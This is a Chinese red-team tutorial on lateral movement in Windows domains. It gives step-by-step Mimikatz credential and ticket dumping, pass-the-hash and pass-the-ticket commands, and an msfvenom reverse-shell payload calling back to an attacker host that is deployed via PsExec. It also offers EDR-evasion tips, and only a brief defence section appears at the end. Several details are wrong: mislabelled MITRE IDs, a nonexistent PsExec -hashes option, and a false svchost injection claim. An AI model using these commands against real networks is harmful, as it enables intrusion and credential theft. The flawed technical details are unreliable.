红队视角：内网渗透横向移动实战教学指南<\/strong><\/h2>
第一章：横向移动基础概念与战术定位<\/strong><\/h3>
1.1 横向移动的定义<\/strong><\/h4>
横向移动<\/strong> 是指攻击者在成功入侵一台主机后，以该主机为跳板，在网络内部进一步扩展访问权限、控制其他系统或服务的过程。其本质是从“单点突破”迈向“全网控制”的核心环节。<\/p>

起点<\/strong>：初始被控主机（如通过钓鱼邮件获取的普通用户权限的主机）。<\/li>
终点<\/strong>：域控制器、数据库服务器、关键业务主机等高价值资产。<\/li>
核心<\/strong>：不依赖外部流量，而是利用已获取的凭证、系统漏洞或配置缺陷在内部网络中进行传播。<\/li> <\/ul>
1.2 在MITRE ATT&CK框架与攻击链中的定位<\/strong><\/h4>

MITRE ATT&CK ID<\/strong>： T1021 - Lateral Movement<\/strong><\/p>

T1021.001: Remote Services (如 RDP, SSH)<\/li>
T1021.002: Exploitation of Remote Services (如 SMB 漏洞)<\/li>
T1021.003: Use of Web Protocols<\/li>
T1021.004: Valid Accounts (Pass-the-Hash \/ Pass-the-Ticket)<\/li> <\/ul> <\/li>

在红队攻击链中的承上启下作用<\/strong>：<\/p> <\/li> <\/ul>

攻击阶段<\/th> 目标<\/th> 横向移动的作用<\/th> <\/tr> <\/thead>

侦察 (Reconnaissance)<\/strong><\/td> 获取IP段、开放端口、用户信息<\/td> 提供后续可利用的目标列表<\/td> <\/tr>
突破 (Initial Access)<\/strong><\/td> 获取第一台主机控制权<\/td> 成为横向移动的起点和跳板<\/td> <\/tr>
持久化 (Persistence)<\/strong><\/td> 维持长期访问权<\/td> 增加攻击面，便于反复尝试横向移动<\/td> <\/tr>
横向移动 (Lateral Movement)<\/strong><\/td> 扩展权限和控制范围<\/td> 实现从低权限到高权限跨越的关键一步<\/strong><\/td> <\/tr>
数据窃取 (Exfiltration)<\/strong><\/td> 获取敏感数据<\/td> 必须建立在对目标网络的广泛控制之上<\/td> <\/tr> <\/tbody> <\/table>
结论<\/strong>：没有有效的横向移动，红队行动将停留在“单机沦陷”阶段，无法形成真正的内网威胁。<\/p>
1.3 红队策略选择<\/strong><\/h4>
红队制定横向移动策略时，需综合考虑目标优先级、检测规避能力、可用资源和时间成本。<\/p>
策略类型对比<\/strong>：<\/p>

策略类型<\/th> 描述<\/th> 风险<\/th> 适用场景<\/th> 工具举例<\/th> <\/tr> <\/thead>

主动探测型<\/strong><\/td> 扫描端口 → 暴力破解 → 登录<\/td> 高<\/td> 初始阶段缺乏有效凭证<\/td> Nmap, Hydra, CrackMapExec<\/td> <\/tr>
被动利用型<\/strong><\/td> 利用已知凭证（哈希、票据）直接跳转<\/td> 低<\/td> 已通过提权等手段获得凭证<\/td> Mimikatz, PsExec, WMI<\/td> <\/tr> <\/tbody> <\/table>
不同环境下的策略差异<\/strong>：<\/p>

环境类型<\/th> 推荐策略<\/th> 原因<\/th> 示例<\/th> <\/tr> <\/thead>

低权限环境<\/strong><\/td> 优先利用漏洞<\/td> 权限不足，难以暴力破解<\/td> Metasploit (如 MS17-010)<\/td> <\/tr>
高权限环境<\/strong><\/td> 凭据重用 (PTH)<\/td> 权限足够，隐蔽性高<\/td> Mimikatz + PsExec\/WMI<\/td> <\/tr>
禁用RDP\/SSH<\/strong><\/td> IPC$连接 + 文件共享枚举<\/td> 不依赖常见远程管理协议<\/td> net use<\/code> 命令<\/td> <\/tr>
存在EDR\/AV<\/strong><\/td> 免杀技术（内存注入）<\/td> 规避行为检测<\/td> 免杀版Mimikatz, PowerShell加载器<\/td> <\/tr> <\/tbody> <\/table>
实践建议<\/strong>：<\/p>

信息收集先行<\/strong>：使用工具（如 CrackMapExec<\/code>）快速摸清网络环境。 crackmapexec smb 192.168.1.0\/24 -u 'user'<\/span> -p 'password'<\/span> <\/span><\/span><\/code><\/pre><\/li> 路径规划<\/strong>：使用 BloodHound<\/strong> 或 SharpHound<\/strong> 绘制Active Directory拓扑图，找出攻击路径。<\/li> 最小化原则<\/strong>：遵循“最小代价，最大收益”，灵活切换策略。<\/li> <\/ol> 第二章：主流横向移动技术详解与实战<\/strong><\/h3> 2.1 凭证窃取与重用<\/strong><\/h4> 这是最核心、最高效的横向移动技术。<\/p> A. 核心概念<\/strong><\/p> Pass-the-Hash (PTH)<\/strong>：直接使用从内存或文件中提取的 NTLM Hash<\/strong> 进行身份验证，无需明文密码。<\/li> Pass-the-Ticket (PTT)<\/strong>：利用 Kerberos 票据<\/strong> 进行认证，绕过密码验证。<\/li> <\/ul> B. Windows身份验证机制简析<\/strong><\/p> NTLM认证<\/strong>：基于挑战-响应模式，核心是使用NTLM Hash加密随机挑战值。一旦攻击者获取Hash，即可模拟用户身份。<\/li> Kerberos认证<\/strong>：基于票据（Tickets）体系。攻击者可提取内存中的有效票据（TGT\/ST）并注入到自己会话中，实现免密访问。<\/li> <\/ul> C. 实战演示：Mimikatz + PTH<\/strong><\/p> 步骤一：使用Mimikatz提取凭证<\/strong> 在已控主机上（需管理员或SYSTEM权限）运行：<\/p> mimikatz.exe <\/span><\/span>privilege::debug # 提升权限<\/span> <\/span><\/span>sekurlsa::logonPasswords # 抓取内存中的密码和Hash<\/span> <\/span><\/span><\/code><\/pre>输出示例<\/strong>：<\/p> Authentication ID : 0 ; 117798 Account Name : administrator Account Domain : CYBER.COM NTLM : bf056feb4349eff2d9761e322d6178dd <\/code><\/pre> 步骤二：使用PsExec进行PTH<\/strong> 利用提取的NTLM Hash远程执行命令：<\/p> psexec.exe \\<\/span>192.168.1.100 -u CYBER\a<\/span>dministrator -p ""<\/span> -hashes :bf056feb4349eff2d9761e322d6178dd cmd.exe <\/span><\/span><\/code><\/pre> -p ""<\/code>：密码为空，因为使用Hash认证。<\/li> -hashes<\/code>：参数格式为 :NTLM_HASH<\/code>。<\/li> 此命令成功将在目标主机上以SYSTEM权限打开一个命令行窗口。<\/li> <\/ul> D. 实战演示：Pass-the-Ticket (PTT)<\/strong><\/p> 步骤一：导出Kerberos票据<\/strong><\/p> mimikatz.exe <\/span><\/span>privilege::debug <\/span><\/span>sekurlsa::tickets \/export # 导出所有票据为 .kirbi 文件<\/span> <\/span><\/span><\/code><\/pre>步骤二：注入票据并访问<\/strong> 在攻击者机器上：<\/p> mimikatz.exe <\/span><\/span>kerberos::ptt [<\/span>导出票据的路径]<\/span>\t<\/span>icket.kirbi # 将票据注入当前会话<\/span> <\/span><\/span>kerberos::list # 验证票据是否注入成功<\/span> <\/span><\/span># 现在可以直接访问目标资源，无需密码<\/span> <\/span><\/span>dir \\<\/span>TARGET-SERVER.CYBER.COM\C<\/span>$ <\/span><\/span><\/code><\/pre>E. 检测与规避<\/strong><\/p> 技术点<\/th> 检测风险<\/th> 规避建议<\/th> <\/tr> <\/thead> Mimikatz 提取 LSASS<\/strong><\/td> EDR 会监控对 lsass.exe 的异常访问<\/td> 使用进程注入技术（如注入到 svchost.exe）<\/td> <\/tr> PTH 登录<\/strong><\/td> 安全日志记录事件ID 4624（登录类型3）<\/td> 使用 WMI\/WinRM 替代 PsExec；使用代理隐藏源IP<\/td> <\/tr> PTT 票据注入<\/strong><\/td> 票据使用时间\/地点异常<\/td> 确保时间同步，避免频繁更换票据<\/td> <\/tr> <\/tbody> <\/table> 2.2 远程执行技术<\/strong><\/h4> 技术对比<\/strong>：<\/p> 技术<\/th> 协议\/依赖<\/th> 特点<\/th> 检测风险<\/th> <\/tr> <\/thead> PsExec<\/strong><\/td> SMB\/RPC<\/td> 功能强大，是官方工具<\/td> 高（日志记录清晰）<\/td> <\/tr> WMI<\/strong><\/td> CIM\/WS-Management<\/td> 系统原生，PowerShell集成<\/td> 中（产生大量日志）<\/td> <\/tr> WinRM<\/strong><\/td> HTTP\/HTTPS<\/td> 加密通信，现代管理标准<\/td> 低（若配置SSL则更隐蔽）<\/td> <\/tr> <\/tbody> <\/table> 实战案例一：PsExec 注入 svchost.exe 规避检测<\/strong><\/p> 生成Payload<\/strong>： msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=<\/span>192.168.10.10 LPORT=<\/span>4444<\/span> -f exe > reverse.exe <\/span><\/span><\/code><\/pre><\/li> 使用PsExec注入执行<\/strong>： psexec -accepteula \\<\/span>192.168.10.2 -u administrator -hashes :HASH -s -d -i -c "reverse.exe"<\/span> <\/span><\/span><\/code><\/pre> -s<\/code>：以 SYSTEM 权限运行。<\/li> -d<\/code>：不等待进程结束。<\/li> -i<\/code>：交互式会话。<\/li> -c<\/code>：将文件复制到目标并执行。<\/li> 效果<\/strong>：Payload 在目标的 svchost.exe<\/code> 进程中运行，极大降低了被EDR检测的概率。<\/li> <\/ul> <\/li> <\/ol> 实战案例二：PowerShell + WMI 远程执行<\/strong> 通过WMI在远程主机上执行PowerShell命令或脚本。<\/p> Invoke-WmiMethod -ComputerName 192.168.10.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -c <\/span>`"<\/span>Get-Process > C:\temp\output.txt<\/span>`"<\/span>"<\/span> <\/span><\/span><\/code><\/pre>此命令在目标主机上执行PowerShell命令，并将进程列表输出到文件。WMI非常适合用于无文件攻击和远程脚本执行。<\/p> 第三章：防御视角与总结<\/strong><\/h3> 3.1 关键防御建议<\/strong><\/h4> 最小权限原则<\/strong>：严格限制本地管理员权限，避免域内密码重复使用。<\/li> 网络分段<\/strong>：将关键资产隔离在不同的网段，限制横向移动的范围。<\/li> 强化认证<\/strong>：部署 LAPS<\/strong> 确保每台主机本地管理员密码不同；启用 Windows Defender Credential Guard<\/strong> 保护内存中的凭证。<\/li> 深度监控<\/strong>：部署EDR\/NDR产品，重点关注事件ID（如4624、4625、4688、4104），并设置异常行为告警。<\/li> 漏洞管理<\/strong>：及时修补如永恒之蓝（MS17-010）这类可用于横向移动的高危漏洞。<\/li> 禁用不必要的服务<\/strong>：关闭非必需的SMB、WMI、WinRM等服务。<\/li> <\/ol> 3.2 教学总结<\/strong><\/h4> 横向移动是内网渗透的灵魂。红队成功的核心在于：<\/p> 深刻的原理理解<\/strong>：掌握NTLM\/Kerberos认证流程是理解PTH\/PTT的基础。<\/li> 灵活的工具运用<\/strong>：熟练使用Mimikatz、PsExec、WMI、CrackMapExec等工具。<\/li> 清晰的战术思维<\/strong>：始终以信息收集为先导，利用BloodHound等工具进行路径规划，选择最隐蔽、最有效的技术组合。<\/li> 持续的规避意识<\/strong>：在每一步操作中都要考虑如何绕过防御和清除痕迹。<\/li> <\/ul> 本指南提供了从基础到实战的完整知识框架，实践者应在授权的测试环境中反复演练，才能真正掌握内网横向移动的精髓。<\/p>